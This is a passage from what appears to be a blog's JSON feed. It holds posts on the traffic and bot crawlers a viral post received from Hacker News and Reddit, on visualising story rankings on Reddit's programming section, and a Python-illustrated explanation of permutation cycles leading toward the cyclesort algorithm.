Slurp<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Unidentified bot from a <a\n        href=\"http:\/\/www.bbc.co.uk\/blogs\/rad\/\">BBC RAD labs<\/a> IP.\n        <\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.oneriot.com\/\">OneRiot<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td rowspan=\"4\">2<\/td> <td><a href=\"http:\/\/friendfeed.com\/about\/bot\">FriendFeed<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.kosmix.com\/\">Kosmix<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/labs.topsy.com\/butterfly\/\">Topsy Butterfly<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Unidentified bot from <a href=\"http:\/\/marban.com\">marban.com<\/a> subdomain. (PoPUrls?)<\/td>\n    <\/tr>\n    <tr>\n        <td rowspan=\"2\">3<\/td> <td><a href=\"http:\/\/metauri.com\/\">metauri.com<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/search.msn.com\/msnbot.htm\">msnbot<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td rowspan=\"2\">6<\/td> <td><a href=\"http:\/\/summify.com\">Summify<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Bot identifying itself just as \"NING\", can't confirm that it's <a\n        href=\"http:\/\/www.ning.com\/\">the Ning<\/a>. <\/td>\n    <\/tr>\n    <tr>\n        <td>9<\/td> <td><a href=\"http:\/\/tineye.com\/crawler.html\">tineye<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>26<\/td> <td><a href=\"http:\/\/spinn3r.com\/robot\">spinn3r.com<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>27<\/td> <td><a href=\"http:\/\/www.backtype.com\/\">backtype.com<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>47<\/td> <td><a href=\"http:\/\/www.facebook.com\/externalhit_uatext.php\">facebookexternalhit<\/a><\/td>\n    <\/tr>\n<\/table>\n<h2 id=\"enter-the-heavyweights-hacker-news-and-reddit\">Enter the heavyweights: Hacker News and Reddit<\/h2>\n<p>48 minutes after the post was published, the first hit from a social news site\nappears: hello <a href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>. 
The post\nquickly makes it onto the front page, and HN traffic peaks at 399 hits per hour\nin the second hour after publication. All told, the post got 2337 hits with a\nHN <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/HTTP_referrer\">referrer header<\/a>.<\/p>\n<div class=\"media\">\n    <a href=\"ycombinator.png\">\n        <img src=\"ycombinator.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        news.ycombinator.com\n    <\/div>\n    \n<\/div>\n<p>Two hours and three minutes after publication, the real monster of social news\narrives: the first hit from Reddit appears. The Reddit traffic peaks in the\nsixth hour after publication at 3025 hits per hour, and delivers a total of\n23807 hits in the 51 hours after publication.<\/p>\n<div class=\"media\">\n    <a href=\"reddit.png\">\n        <img src=\"reddit.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        reddit.com\/r\/programming\n    <\/div>\n    \n<\/div><h2 id=\"the-long-tail\">The long tail<\/h2>\n<p>Reddit accounted for the vast majority of the post's traffic, dwarfing all\nother sources combined. In all, I received only 2300 hits with specified\nreferrer headers that weren't Reddit or HN. 
Here are all the referrers that\nwere responsible for more than 10 hits to the post:<\/p>\n<table>\n    <tr><th>hits<\/th><th>site<\/th><\/tr>\n    <tr><th>456<\/th> <td><a href=\"http:\/\/popurls.com\">popurls.com<\/a><\/td><\/tr>\n    <tr><th>359<\/th> <td><a href=\"http:\/\/www.google.com\/reader\">Google Reader<\/a><\/td><\/tr>\n    <tr><th>282<\/th> <td><a href=\"http:\/\/twitter.com\">Twitter<\/a><\/td><\/tr>\n    <tr><th>196<\/th> <td><a href=\"http:\/\/jimmyr.com\">jimmyr.com<\/a><\/td><\/tr>\n    <tr><th>183<\/th> <td><a href=\"http:\/\/delicious.com\">delicious<\/a><\/td><\/tr>\n    <tr><th>153<\/th> <td><a href=\"http:\/\/pop.is\">pop.is<\/a><\/td><\/tr>\n    <tr><th>139<\/th> <td><a href=\"http:\/\/www.google.com\">Google Search<\/a><\/td><\/tr>\n    <tr><th>82<\/th> <td><a href=\"http:\/\/www.wired.com\">wired.com<\/a><\/td><\/tr>\n    <tr><th>56<\/th> <td><a href=\"http:\/\/www.facebook.com\">Facebook<\/a><\/td><\/tr>\n    <tr><th>36<\/th> <td><a href=\"http:\/\/longurl.com\">longurl.com<\/a><\/td><\/tr>\n    <tr><th>36<\/th> <td><a href=\"http:\/\/glozer.net\/trendy\">glozer.net\/trendy<\/a><\/td><\/tr>\n    <tr><th>30<\/th> <td><a href=\"http:\/\/oursignal.com\">oursignal.com<\/a><\/td><\/tr>\n    <tr><th>28<\/th> <td><a href=\"http:\/\/hackurls.com\">hackurls.com<\/a><\/td><\/tr>\n    <tr><th>24<\/th> <td><a href=\"http:\/\/pipes.yahoo.com\">Yahoo Pipes<\/a><\/td><\/tr>\n    <tr><th>18<\/th> <td><a href=\"http:\/\/www.netvibes.com\">www.netvibes.com<\/a><\/td><\/tr>\n    <tr><th>15<\/th> <td><a href=\"http:\/\/dzone.com\">dzone.com<\/a><\/td><\/tr>\n    <tr><th>11<\/th> <td><a href=\"http:\/\/www.freshnews.com\">www.freshnews.org<\/a><\/td><\/tr>\n<\/table>\n<p>It's interesting to see that I got nearly 200 hits from delicious.com. By\ncontrast, <a rel=\"external\" href=\"http:\/\/pinboard.in\">pinboard.in<\/a> - which seems to be delicious.com's\nanointed successor - sent me only two hits. 
Then again, my post was published\nin late November 2010, about a month before Yahoo <a rel=\"external\" href=\"http:\/\/techcrunch.com\/2010\/12\/16\/is-yahoo-shutting-down-del-icio-us\/\">spectacularly\nhobbled<\/a>\ntheir bookmarking property. I wonder what those figures would look like today.<\/p>\n<p>The thin end of the long tail consists of the 200 hits from 94 sites that were\nresponsible for 10 or fewer hits each. We can break this motley crew up into a\nfew different classes:<\/p>\n<ul>\n<li>Sites that provide some sort of social news analysis, piggy-backing off HN,\nReddit and delicious.com. For example, <a rel=\"external\" href=\"http:\/\/popacular.com\">popacular.com<\/a>,\n<a rel=\"external\" href=\"http:\/\/seesmic.com\">seesmic.com<\/a>, <a rel=\"external\" href=\"http:\/\/hotgrog.com\">hotgrog.com<\/a>.<\/li>\n<li>URL shorteners like <a rel=\"external\" href=\"http:\/\/j.mp\">j.mp<\/a> and unshorteners like\n<a rel=\"external\" href=\"http:\/\/untiny.me\">untiny.me<\/a><\/li>\n<li>Social media-ish services like <a rel=\"external\" href=\"http:\/\/friendfeed.com\">FriendFeed<\/a>,\n<a rel=\"external\" href=\"http:\/\/stumbleupon.com\">StumbleUpon<\/a>, <a rel=\"external\" href=\"http:\/\/pinboard.in\">pinboard.in<\/a><\/li>\n<li>Tiny personal blogs.<\/li>\n<li>And, surprisingly - a number of sites that just provide an alternative\ninterface or URL for Hacker News: <a rel=\"external\" href=\"http:\/\/hackerne.ws\/\">hackerne.ws<\/a>,\n<a rel=\"external\" href=\"http:\/\/ihackernews.com\/\">ihackernews.com<\/a>,\n<a rel=\"external\" href=\"http:\/\/hacker-newspaper.gilesb.com\/\">hacker-newspaper.gilesb.com<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.icombinator.net\/\">www.icombinator.net<\/a>.<\/li>\n<\/ul>\n<h2 id=\"robot-scavengers-of-the-social-news-ecosphere\">Robot scavengers of the social news ecosphere<\/h2>\n<p>Let's take a look at overall bot traffic, separating out our silicon friends by\nlooking for non-human and non-standard user-agent 
headers. The moment the post\nhits the HN front page bot traffic spikes, and this spike continues as the post\nis submitted to Reddit and starts its climb up the proggit front page.<\/p>\n<div class=\"media\">\n    <a href=\"robots.png\">\n        <img src=\"robots.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        robots\n    <\/div>\n    \n<\/div>\n<p>Enter the robot scavengers of the social news ecosphere - a set of second-tier\naggregators that monitor social news and Twitter for hot stories. Here's a\nsample of bot visitors, taken more or less at random from the logs:<\/p>\n<table>\n    <tr><td><a href=\"http:\/\/inagist.com\">inagist.com<\/a><\/td>\n    <td><a href=\"http:\/\/www.netvibes.com\">www.netvibes.com<\/a><\/td>\n    <td><a href=\"http:\/\/chattertrap.com\">chattertrap.com<\/a><\/td>\n    <td><a href=\"http:\/\/twingly.com\">twingly.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/coder.io\">coder.io<\/a><\/td>\n    <td><a href=\"http:\/\/newsmagpie.com\">newsmagpie.com<\/a><\/td>\n    <td><a href=\"http:\/\/worio.com\">worio.com<\/a><\/td>\n    <td><a href=\"http:\/\/www.myvbo.com\">www.myvbo.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/www.zemanta.com\">www.zemanta.com<\/a><\/td>\n    <td><a href=\"http:\/\/embed.ly\">embed.ly<\/a><\/td>\n    <td><a href=\"http:\/\/brandwatch.net\">brandwatch.net<\/a><\/td>\n    <td><a href=\"http:\/\/www.flipboard.com\">www.flipboard.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/paper.li\">paper.li<\/a><\/td>\n    <td><a href=\"http:\/\/rivva.de\">rivva.de<\/a><\/td>\n    <td><a href=\"http:\/\/attribyte.com\">attribyte.com<\/a><\/td>\n    <td><a href=\"http:\/\/diffbot.com\">diffbot.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/yoono.com\">yoono.com<\/a><\/td>\n    <td><a href=\"http:\/\/hatena.net.jp\">hatena.net.jp<\/a><\/td>\n    <td><a href=\"http:\/\/hourlypress.com\">hourlypress.com<\/a><\/td>\n    <td><a 
href=\"http:\/\/longurl.org\">longurl.org<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/untiny.me\">untiny.me<\/a><\/td>\n    <td><a href=\"http:\/\/goo.ne.jp\">goo.ne.jp<\/a><\/td>\n    <td><a href=\"http:\/\/www.baidu.com\">www.baidu.com<\/a><\/td>\n    <td><a href=\"http:\/\/sharethis.com\">sharethis.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/ideashower.com\">ideashower.com<\/a><\/td>\n    <td><a href=\"http:\/\/pannous.info\">pannous.info<\/a><\/td>\n    <td><a href=\"http:\/\/wikiwix.com\">wikiwix.com<\/a><\/td>\n    <td><a href=\"http:\/\/pipes.yahoo.com\">pipes.yahoo.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/mustexist.com\">mustexist.com<\/a><\/td>\n    <td><a href=\"http:\/\/pics.fefoo.com\">pics.fefoo.com<\/a><\/td>\n    <td><a href=\"http:\/\/cyber.law.harvard.edu\">cyber.law.harvard.edu<\/a><\/td>\n    <td><a href=\"http:\/\/seatgeek.com\">seatgeek.com<\/a><\/td><\/tr>\n    <tr><td><a href=\"http:\/\/metadatalabs.com\">metadatalabs.com<\/a><\/td>\n    <td><a href=\"http:\/\/moreover.com\">moreover.com<\/a><\/td>\n    <td><a href=\"http:\/\/thinglabs.com\">thinglabs.com<\/a><\/td>\n    <td><a href=\"http:\/\/stufftotweet.com\">stufftotweet.com<\/a><\/td><\/tr>\n    <tr>\n        <td><a href=\"http:\/\/chilitweets.com\">chilitweets.com<\/a><\/td>\n        <td><a href=\"http:\/\/bkluster.hut.edu.vn\">bkluster.hut.edu.vn<\/a><\/td>\n        <td><a href=\"http:\/\/wikio.com\">wikio.com<\/a><\/td>\n        <td><a href=\"http:\/\/pipes.yahoo.com\">Yahoo Pipes<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/zite.com\">zite.com<\/a><\/td>\n        <td><a href=\"http:\/\/zelist.ro\">zelist.ro<\/a><\/td>\n        <td><a href=\"http:\/\/buzzzy.com\">buzzzy.com<\/a><\/td>\n        <td><a href=\"http:\/\/intravnews.com\">intravnews.com<\/a><\/td>\n    <\/tr>\n<\/table>\n<p>At this point, I'd like to bitch a bit about how astonishingly badly behaved\nsome of the automated systems skulking around today's web are. 
The vast, vast\nmajority don't provide any clue about the responsible entity in the user-agent\nstring. The list above consists of responsible bots that do identify\nthemselves, and less responsible ones that I could identify through reverse\ndomain resolution. Most of the irresponsible bots come from Amazon Web\nServices, which seems to be a right wretched hive of scum and villainy. The\nworst performers here boggle the mind - about a dozen hosts from AWS retrieved\nthe blog post more than 200 times a day, all using full GET requests, without\nan If-Modified-Since header, and with no identification. The arch-villain hit\nthe post 600 times in its first 24 hours - that's about once every 2.5 minutes.<\/p>\n<h2 id=\"referrer-less-viewers-and-stealthy-bots\">Referrer-less viewers and stealthy bots<\/h2>\n<p>I was surprised to see that almost 20% of requests not identified as bot\nrequests had no specified referrer, a much greater percentage than I would have\nanticipated. Here's a graph showing the number of referrer-less requests per\nhour:<\/p>\n<div class=\"media\">\n    <a href=\"noreferrer.png\">\n        <img src=\"noreferrer.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        requests without a referrer\n    <\/div>\n    \n<\/div>\n<p>It looks like the double-peak in this graph coincides with the traffic peaks\nfrom HN and Reddit. This suggests that the majority of these hits do in fact\ncome (perhaps indirectly) from HN and Reddit users. One possibility is that a\nchunk of this referrer-less traffic comes from non-browser Twitter clients.<\/p>\n<p>A fraction of the referrer-less traffic also comes from stealthy bots sending\nuser-agent strings that match those of desktop browsers. About 5% of these\nrequests, for example, come from the Amazon EC2 cloud, so are unlikely to be\nreal browsers. 
One Internet darling that does this is Instapaper, which seems\nto use the requesting client's user-agent string rather than frankly confessing\nitself to be a bot. It also appears to re-request an article in full for each\nuser, rather than simply checking if there's been a change and using a cached\ncopy. On the upside, this means that I know that 131 readers used Instapaper to\nview my post.<\/p>\n<h2 id=\"aftermath\">Aftermath<\/h2>\n<p>After the post drifts off the proggit and HN front pages, traffic dies down.\nThere's a dwindling tail of stragglers that bothered to flip through to the\nsecond or third page of top stories, and a tiny dribble of users who discovered\nthe link through other sources. A month later, the post gets about 60 hits per\nday, of which more than a third are from bots. Non-bot traffic is still\ndominated by Reddit, presumably from people searching or idly flicking through\nReddit's history.<\/p>\n<p>So, in the end, after my once-thrumming server quiets down, what has the\nlasting effect been on my own social graph? I had a small surge of Twitter\nfollows, going from 230 to 245 followers. There was a minor blip of subscribers\nto my RSS feed, with Google Reader reporting subscriptions going from about 510\nto 551. Out of 33,000 unique visitors 56 decided to cultivate a more permanent\nrelationship of some sort to my blog. That's 1 in 600. 
If you remember only one\nfigure from this post, this should be it.<\/p>\n"},{"title":"A journey through the bowels of proggit","published":"2011-01-12T00:00:00+00:00","updated":"2011-01-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/redditgraph\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/redditgraph\/","content":"<div class=\"media\">\n    <a href=\"proggit4.png\">\n        <img src=\"proggit4.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        proggit - 4 hours\n    <\/div>\n    \n<\/div>\n<p>I've had a nagging sense of dissatisfaction with my information diet lately, and\nit's becoming clear that over-reliance on social news sites like Reddit and\nHacker News (much as I love them) lies at the heart of my discontent. For the\npast few months, I've been gathering data to help me come up with a coherent\nexplanation for my malaise. I'm still working on it, so this post will have no\nconclusions, only repulsive metaphors and pretty pictures.<\/p>\n<p>For a week or so in November I logged the slow, peristaltic progress of stories\nthrough the bowels of <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/programming\">proggit<\/a>, watching\nthem get nudged this way and that by the malodorous, hot gas of public opinion\nbefore finally being shunted on to the colon of the second page of results.  In\nother words, I sampled the top 25 stories every 5 minutes through the RSS feed.\nOne of the things I was interested in was how submission rankings changed over\ntime, so I visualised the dataset using the same technique I came up with to\n<a rel=\"external\" href=\"http:\/\/sortvis.org\">visualise sorting algorithms<\/a>. The image above shows 4\nhours of proggit, with each submission represented by a line. 
The lines are\ncoloured based on the average rank the story achieves over its lifetime in the\ntop 25, ranging between upvote orange for top stories, and downvote blue for\nbottom stories.<\/p>\n<p>Here's a bigger sample - 72 hours of data embedded in a widget to let you zoom\nand pan around. The busy cut-and-thrust of life on reddit is all here. The\nmeteoric rise, inevitably followed by long, slow decay. The sudden, mysterious,\nmid-flight disappearances. The jostling and writhing among the bottom\nsubmissions that never quite manage to make it into the big leagues. Heady\nstuff. Click to view:<\/p>\n<div class=\"media\">\n    <a href=\"proggit72.png\">\n        <img src=\"mini72.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        proggit - 72 hours\n    <\/div>\n    \n<\/div>\n<p>Perhaps I'll do an expanded version that lets you view submission titles, times\nand so forth later on.<\/p>\n"},{"title":"Cyclesort - a curious little sorting algorithm","published":"2010-11-22T00:00:00+00:00","updated":"2010-11-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/cyclesort\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/cyclesort\/","content":"<p>One of the nice things about building <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> and\nwriting the posts that led up to it is that people email me with pointers to\nesoteric algorithms I've never heard of. Today's post is dedicated to one of\nthese - a curious little sorting algorithm called\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Cycle_sort\">cyclesort<\/a>. 
It was described in 1990\nin a <a rel=\"external\" href=\"http:\/\/comjnl.oxfordjournals.org\/content\/33\/4\/365.full.pdf\">3-page paper by B.K.\nHaddon<\/a>, and has\nbecome a firm favourite of mine.<\/p>\n<p>Cyclesort has some nice properties - for certain restricted types of data it\ncan do a stable, in-place sort in linear time, while guaranteeing that each\nelement will be moved at most once. But what I really like about this algorithm\nis how naturally it arises from a simple theorem on <a rel=\"external\" href=\"http:\/\/mathworld.wolfram.com\/SymmetricGroup.html\">symmetric\ngroups<\/a>.  Bear with me while\nI work up to the algorithm through a couple of basic concepts.<\/p>\n<h2 id=\"cycles\">Cycles<\/h2>\n<p>Let's start with the definition of a\n<a rel=\"external\" href=\"http:\/\/mathworld.wolfram.com\/PermutationCycle.html\">cycle<\/a>. A cycle is a subset\nof elements from a permutation that have been rotated from their original\nposition. So, say we have an ordered set <strong>[0, 1, 2, 3, 4]<\/strong>, and a cycle <strong>[0,\n3, 1]<\/strong>. The cycle defines a rotation where element 0 moves to position 3, 3 to\n1 and 1 to 0.  Visually, it looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"graph1.png\">\n        <img src=\"graph1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We can apply a cycle to an ordered set to obtain a permutation, and we can then\nreverse that cycle to re-obtain the original set. 
Here's a Python function that\napplies a cycle to a list in-place:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> apply_cycle<\/span><span>(lst, c):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    # Extract the cycle&#39;s values<\/span><\/span>\n<span class=\"giallo-l\"><span>    vals<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [lst[i]<\/span><span style=\"color: #D73A49;\"> for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span> c]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    # Rotate them circularly by one position<\/span><\/span>\n<span class=\"giallo-l\"><span>    vals<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [vals[<\/span><span style=\"color: #D73A49;\">-<\/span><span style=\"color: #005CC5;\">1<\/span><span>]]<\/span><span style=\"color: #D73A49;\"> +<\/span><span> vals[:<\/span><span style=\"color: #D73A49;\">-<\/span><span style=\"color: #005CC5;\">1<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    # Re-insert them into the list<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i, offset<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> enumerate<\/span><span>(c):<\/span><\/span>\n<span class=\"giallo-l\"><span>        lst[offset]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> vals[i]<\/span><\/span><\/code><\/pre>\n<p>Here's an interactive session showing the function in action:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> lst<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [<\/span><span style=\"color: 
#005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> c<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [<\/span><span style=\"color: #005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> apply_cycle(lst, c)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> lst<\/span><\/span>\n<span class=\"giallo-l\"><span>[<\/span><span style=\"color: #005CC5;\">1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> c.reverse()<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> apply_cycle(lst, c)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> lst<\/span><\/span>\n<span class=\"giallo-l\"><span>[<\/span><span style=\"color: #005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>]<\/span><\/span><\/code><\/pre><h2 id=\"permutations\">Permutations<\/h2>\n<p>Now, it's a fascinating fact that <strong>any permutation can be decomposed into a\nunique set of disjoint 
cycles<\/strong>. We can think of this as analogous to the\nfactorization of a number - every permutation is the product of a unique set of\ncomponent cycles in the same way every number is the product of a unique set of\nprime factors.  Taking this as a given, how could we calculate the cycles that\nmake up a permutation?  One obvious way to proceed is to pick a starting point,\nand simply \"follow\" the cycle in reverse until we get back to where we started.\nWe know from the result above that the element is guaranteed to be part of a\ncycle, so we must eventually reach our starting point again. When we do, hey\npresto, we have a complete cycle. If we keep track of the elements that are\nalready part of a known cycle, we can skip to the next unknown element and\nrepeat the process.  Once we reach the end of the list we're done.<\/p>\n<p>This scheme can only work if we know where in the ordered sequence any given\nelement belongs, because this is the way we find the \"previous hop\" in a cycle.\nIn the examples above, we worked with lists that consist of a contiguous range\nof numbers <strong>0..n<\/strong>, which gives us a short-cut: the element's value <em>is<\/em> its\noffset in the ordered list. 
In the code below I've factored this out into a\nfunction <strong>key<\/strong>, which takes an element value, and returns its correct offset - in\nthis case <strong>key<\/strong> is simply the identity function.<\/p>\n<p>Here's a Python function that finds all cycles in permutations of numbers\nranging from <strong>0..n<\/strong>:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> element<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> find_cycles<\/span><span>(l):<\/span><\/span>\n<span class=\"giallo-l\"><span>    seen<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> set<\/span><span>()<\/span><\/span>\n<span class=\"giallo-l\"><span>    cycles<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: #005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> key(l[i])<\/span><span style=\"color: #D73A49;\"> and not<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span> seen:<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycle<\/span><span style=\"color: #D73A49;\"> =<\/span><span> []<\/span><\/span>\n<span class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span 
style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                cycle.append(n)<\/span><\/span>\n<span class=\"giallo-l\"><span>                n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(l[n])<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span>\n<span class=\"giallo-l\"><span>            seen<\/span><span style=\"color: #D73A49;\"> =<\/span><span> seen.union(<\/span><span style=\"color: #005CC5;\">set<\/span><span>(cycle))<\/span><\/span>\n<span class=\"giallo-l\"><span>            cycles.append(<\/span><span style=\"color: #005CC5;\">list<\/span><span>(<\/span><span style=\"color: #005CC5;\">reversed<\/span><span>(cycle)))<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> cycles<\/span><\/span><\/code><\/pre>\n<p>Running it on our example permutation produces the cycle we used to produce it:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> find_cycles([<\/span><span style=\"color: #005CC5;\">1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>])<\/span><\/span>\n<span class=\"giallo-l\"><span>[[<\/span><span style=\"color: #005CC5;\">3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 
0<\/span><span>]]<\/span><\/span><\/code><\/pre>\n<p>Here's <strong>find_cycles<\/strong> run on a longer, randomly shuffled list:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> l<\/span><span style=\"color: #D73A49;\"> =<\/span><span> [<\/span><span style=\"color: #005CC5;\">0<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 5<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 6<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 8<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 7<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 9<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;&gt;<\/span><span> find_cycles(l)<\/span><\/span>\n<span class=\"giallo-l\"><span>[[<\/span><span style=\"color: #005CC5;\">7<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 4<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 5<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>], [<\/span><span style=\"color: #005CC5;\">9<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 6<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 2<\/span><span>], [<\/span><span style=\"color: #005CC5;\">8<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 3<\/span><span>]]<\/span><\/span><\/code><\/pre>\n<p>And here's a handsomely colourful graphical version of the output above:<\/p>\n<div class=\"media\">\n    <a href=\"graph2.png\">\n        <img src=\"graph2.png\"  \/>\n    <\/a>\n\n    \n<\/div><h2 id=\"a-sorting-algorithm-emerges\">A sorting algorithm emerges<\/h2>\n<p>Let's take a closer look at the 
